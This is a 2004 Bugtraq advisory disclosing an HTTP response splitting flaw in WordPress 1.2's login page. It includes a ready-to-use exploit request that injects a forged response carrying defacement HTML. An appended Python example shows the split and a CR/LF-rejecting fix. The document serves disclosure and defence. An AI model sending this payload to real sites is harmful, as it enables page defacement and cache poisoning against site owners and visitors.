Date: Wed, 6 Oct 2004 18:41:02 -0500
From: "Chaotic Evil" <chaoticevil@...ring.com>
To: <bugtraq@...urityfocus.com>
Subject: HTTP Response Splitting Vulnerability in Wordpress 1.2

SECURITY ADVISORY: HTTP Response Splitting in WordPress 1.2

AUTHOR: Chaotic Evil (chaoticevil $$$at$$$ spyring $$$dot$$$ com)
DATE: October 6th, 2004
PRODUCT: WordPress 1.2 (wordpress.org)

FROM THE VENDOR WEBSITE:
WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability. What a mouthful. WordPress is both free and priceless at the same time. WordPress was born out of a desire for an elegant, well-architectured personal publishing system built on PHP and MySQL and licensed under the GPL.

SECURITY VULNERABILITY:
HTTP Response Splitting [1].

EXPLOIT:
HOSTNAME, USER and PASS should be replaced with the relevant values (and Content-Length needs to be adjusted accordingly). Replace curly braces with less-than and greater-than signs. Code is line wrapped.

POST /wp-login.php HTTP/1.0
Host: HOSTNAME
Content-Type: application/x-www-form-urlencoded
Content-length: 226

action=login&mode=profile&log=USER&pwd=PASS&text=
%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%20
0%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Length:
%2021%0d%0aContent-Type:%20text/html%0d%0a%0d%0a{html}
*defaced*{/html}

VENDOR STATUS:
Vendor contacted September 24th. Vendor worked closely with the author and promptly produced a fix (see below).

FIX:
Use WordPress 1.2.1. See vendor site: http://wordpress.org/development/2004/10/wp-121/

REFERENCES:
[1] "'Divide and Conquer' - HTTP Response Splitting, Web Cache Poisoning attacks, and Related Topics" by Amit Klein, dated March 4th, 2004
http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
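To make the failure mode and its mitigation concrete, the following Python example (added here; it is neither the advisory's nor WordPress's code) models a server that URL-decodes the `text` parameter and reflects it into a response header, which is assumed to be the vulnerable pattern since the advisory names only the parameter. The unhardened path produces bytes that a downstream proxy or cache reads as two responses; the hardened path rejects any value carrying CR or LF before it can reach a header. The `/profile` Location target is a hypothetical placeholder.

```python
import re
from urllib.parse import unquote

# Constructed sample: the advisory's 'text' parameter value with the
# advisory's line-wrap breaks removed.
ADVISORY_TEXT_PARAM = (
    "%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%20"
    "0%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Length:"
    "%2021%0d%0aContent-Type:%20text/html%0d%0a%0d%0a{html}"
    "*defaced*{/html}"
)

_CRLF = re.compile(r"[\r\n]")
_STATUS_LINE = re.compile(rb"(?m)^(HTTP/1\.[01] \d{3}[^\r\n]*)")


def safe_header_value(value: str) -> str:
    """Hardened path: a header value can never legitimately contain a
    line break, so refuse the request instead of reflecting it."""
    if _CRLF.search(value):
        raise ValueError("CR/LF in header value")
    return value


def build_response(text_param: str, hardened: bool) -> bytes:
    """Model a server that decodes 'text' and reflects it into a Location
    header (hypothetical target path /profile). With hardened=False the
    decoded CR/LF pairs land inside the header block unchanged."""
    decoded = unquote(text_param)
    value = safe_header_value(decoded) if hardened else decoded
    return (
        "HTTP/1.0 302 Found\r\n"
        f"Location: /profile?text={value}\r\n"
        "\r\n"
    ).encode("latin-1")


def status_lines(raw: bytes) -> list[str]:
    """What a proxy or cache sees: every line shaped like a response status
    line. More than one means the single response has been split."""
    return [m.decode("latin-1") for m in _STATUS_LINE.findall(raw)]


if __name__ == "__main__":
    print(status_lines(build_response(ADVISORY_TEXT_PARAM, hardened=False)))
    try:
        build_response(ADVISORY_TEXT_PARAM, hardened=True)
    except ValueError as exc:
        print("rejected:", exc)
```

The same check belongs in front of every call that sets a header from user input (Location, Set-Cookie, Content-Type), and a web application firewall or proxy log search for `%0d%0a` in query or form parameters is a cheap detection for attempts of this kind.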